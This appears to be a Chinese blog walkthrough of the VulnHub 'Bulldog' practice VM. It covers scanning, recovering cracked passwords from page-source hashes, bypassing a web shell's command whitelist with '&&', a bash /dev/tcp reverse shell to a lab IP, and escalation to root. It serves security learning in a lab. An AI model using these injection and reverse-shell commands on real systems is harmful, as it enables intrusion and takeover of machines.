渗透测试系列 — VulnHub –bulldog

正文:

配置网络

与上篇一样
开机进入   修复内核,root一行,ifconfig -a 发现是ens33,vi /etc/network/interfaces  改为ens33即可

参考

漏洞挖掘的详细思路

  • web漏洞思路:

(1) 查看每个网页的源码,看是否有提示;
(2) 暴破目录,用DirBuster,看是否有新网页,找新网页的漏洞;
(3) 找注入或框架漏洞:如果网页有输入框、URL参数,可AWVS扫描注入;如果web使用了某些CMS框架,只能找框架的通用漏洞,通常扫描不到注入。

  • ssh利用思路:

(1) 如得到用户名,可以用就九头蛇或美杜莎暴破弱口令,但需要强大的字典且有弱口令。
(2) 如果得到web管理或系统账号,可以尝试连接ssh,如能连接上,无需反弹shell了。

开始:

1.
nmap 192.168.244.0/24
发现192.168.244.131
2.
nmap -p1-65535 -A 192.168.244.131
端口,协议,后端服务
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (EdDSA)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
3.
dirb http://192.168.244.131
得到  dev/shell   admin
或者使用DirBuster暴破目录(windows有清楚的目录结构)
4.
访问dev/shell  发现要(Please authenticate with the server to use Web-Shell)
5.
新系统不在使用php或任何CMS,而是使用Django框架开发。这意味着不太可能再找到网页的注入漏洞,只能找Django框架漏洞;网站不使用php,无需再找php漏洞或者写php木马;
新系统使用webshell管理,有一个Web-shell链接,点击可访问http://172.20.10.7/dev/shell/,但是需要认证
6.
查看 http://192.168.244.131/dev/  的源码  得到

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->

去cmd5破解,我直接用作者破解得到的密码
用户名:nick,密码:bulldog (CMD5可免费解密出来)
用户名:sarah,密码:bulldoglover (CMD5需要收费解密出来)
7.
这个时候我们找到一个登陆接口,别忘了还有个23端口
先23端口
ssh默认是22
所以ssh -p 23 sarah@192.168.244.131  但是两个账号都登陆不上去
8.这个时候我们试试后台登陆
使用sarah、密码bulldoglover成功登录管理后台,发现没有编辑权限。
9.去webshell页面,http://192.168.244.131/dev/shell/,是个命令执行的页面
10.绕过白名单,可以参考我的另一篇博客,dvwa 里有个小结是command inject
这里是用 ;或者  &&
比如ls是成功的
id回显  INVALID COMMAND. I CAUGHT YOU HACKER!
用ls && id
当然还有其他的过滤情况,还有一些绕过方法
11.
开启nc监听:nc -lvnp 4444
执行ls && bash -i >& /dev//4444 0>&1失败,server报错500。
2)使用echo命令先输出命令,再输入到bash,反弹shell成功:
echo “bash -i >& /dev/tcp/192.168.244.129/4444 0>&1” | bash
成功
“反弹shell应该有多种方法:第一个想到的是bash shell,也想到了python反弹shell。只尝试了通过bash反弹shell,如果bash反弹不成功,可尝试往系统echo文件,赋予+x执行权限,执行脚本反弹。也可尝试Python是否能够反弹shell。”
12.
cat /etc/passwd
bulldogadmin:x:1000:1000:bulldogadmin,,,:/home/bulldogadmin:/bin/bash
django:x:1001:1001:,,,:/home/django:/bin/bash
13.
发现隐藏的包含root密码的文件,通过搜索id为1000之后的用户文件,查看历史命令,或者查看目录,也可能找到。
find / -user bulldogadmin 2>/dev/null

/home/bulldogadmin
/home/bulldogadmin/.nano
/home/bulldogadmin/.bash_logout
/home/bulldogadmin/.cache
/home/bulldogadmin/.wget-hsts
/home/bulldogadmin/.hiddenadmindirectory
/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
/home/bulldogadmin/.hiddenadmindirectory/note
/home/bulldogadmin/.selected_editor
/home/bulldogadmin/.sudo_as_admin_successful
/home/bulldogadmin/.bashrc
/home/bulldogadmin/.profile

14.
隐藏了目录,关注
/home/bulldogadmin/.hiddenadmindirectory
/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
/home/bulldogadmin/.hiddenadmindirectory/note
cat   /home/bulldogadmin/.hiddenadmindirectory/note  得到:
Maybe the webserver is the only one who needs to have root access sometimes?
webserver要root权限
15.
打开customPermissionApp,看上去是可执行文件,使用strings打印其中的可打印字符:
strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
16.
note文件中提示执行该文件,可以获得root权限,但通过ls查看文件权限只有读权限,并无法执行。
尝试下:
1)./home/bulldogadmin/.hiddenadmindirectory/customPermissionApp  执行
cannot execute binary file
2)chmod 777 /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
Operation not permitted
17.
教程中给的是密码的拼接。。。。直接用吧
SUPERultimatePASSWORDyouCANTget
18.
输入su
su: must be run from a terminal
上一篇遇到过,要python的pty,输入
python -c ‘import pty;pty.spawn(“/bin/bash”)’
sudo su –
输入密码  SUPERultimatePASSWORDyouCANTget
得到root权限
二.
也可以ssh 上去
用户名:django
密码:SUPERultimatePASSWORDyouCANTget  (为什么是这个,作者说不用猜)
ssh -p 23 django@192.168.244.131
登陆上去
再  sudo su –
 
2018.6.25

发表评论

电子邮件地址不会被公开。 必填项已用*标注